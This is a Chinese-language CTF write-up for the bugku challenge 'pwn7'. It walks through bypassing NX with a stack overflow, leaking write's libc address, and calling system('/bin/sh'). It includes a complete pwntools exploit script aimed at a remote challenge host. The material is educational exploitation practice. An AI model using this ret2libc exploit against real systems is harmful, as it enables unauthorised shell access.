CTF中的PWN——繞NX防護2（泄露libc + 棧溢出）

前言：

    繼續PWN的學習，今天整理一下繞過NX，同時libc本地不存在需要通過相應函數泄露地址的方式進行進行溢出。

本題工具介紹：

• LibcSearcher 

    一個基於libc_database寫的python庫，可以通過泄露的函數實際地址查找對應的libc版本。

from LibcSearcher import *

#第二個參數，爲已泄露的實際地址,或最後12位(比如：d90)，int類型
obj = LibcSearcher("fgets", 0X7ff39014bd90)

obj.dump("system")        #system 偏移
obj.dump("str_bin_sh")    #/bin/sh 偏移
obj.dump("__libc_start_main_ret")    

    本題 通過write函數實際地址找到遠程的libc，然後dump出其他函數的offset。

• libc_database

    ./add 用來添加libc庫

./add /usr/lib/libc-2.21.so

    ./find 用來查找libc版本

$ ./find printf 260
archive-glibc (id libc6_2.19-10ubuntu2_i386)

    ./dump 用來輸出libc中的一些函數的偏移

$ ./dump libc6_2.19-0ubuntu6.6_i386
offset___libc_start_main_ret = 0x19a83
offset_system = 0x00040190
offset_dup2 = 0x000db590
offset_recv = 0x000ed2d0
offset_str_bin_sh = 0x160a24

    本題找到遠程加載的libc版本後使用此工具dump出其他函數的offset。

題目：（new bugku pwn7）

    檢查程序詳細信息，發現爲32bit，開啓着NX，同時 RELRO:    Partial RELRO。

    放入IDA中靜態分析，發現read()危險函數，主函數有write函數：

    此題目思路：使用wirte函數泄露出（wirte/__libc_start_main)等實際地址，查找對應的libc動態鏈接庫，通過此庫查找系統函數的偏移，計算相應的實際地址，溢出即可。構造payload如下：

from pwn import *

context.log_level = "debug"

#p = process('./pwn7')
p = remote('114.116.54.89',10007)
elf = ELF('./pwn7')

write_plt = elf.plt['write']
write_got = elf.got['write']
print write_got
libc_start_main_got = elf.got['__libc_start_main']
main_addr = 0x0804846B
offset_write = 0x000d43c0
offset_system = 0x0003a940
offset_str_bin_sh = 0x15902b

payload = 'A' * 40 + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4)

p.sendlineafter('plz input your name:\n',payload)
write_addr = u32(p.recv(4))
libc_base = write_addr - offset_write
sys_addr = libc_base + offset_system
sh_addr = libc_base + offset_str_bin_sh

payload = 'A' * 40 + p32(sys_addr) + 'nEIP' + p32(sh_addr)
p.sendline(payload)
p.interactive()

    腳本運行結果如下：

 

    注：常用的32bit帶參溢出的方式中會使用4byte代替PUSH EIP來騙過CPU，但是此軟件要通過溢出泄露出write函數的實際地址後繼續溢出，那麼就需要將返回地址填充想要繼續執行的指令的地址；

           針對本地的調用wirte@plt函數，在構造參數的時候是p32(1) + p32(write_got) +p32(4)作爲write函數的參數，其中“1”表示的是標準輸出，而0代表標準輸入。“4”代表4字節。

總結：

• 關於繞過NX的方式：

1. 軟件有system函數的直接用；
2. 程序自帶libc，直接elf.symbols['system']  elf.search(''/bin/sh)或使用one_gadgat構造ROP鏈；
3. 需要泄露遠端libc版本，一般使用puts/write泄露地址，計算基地址。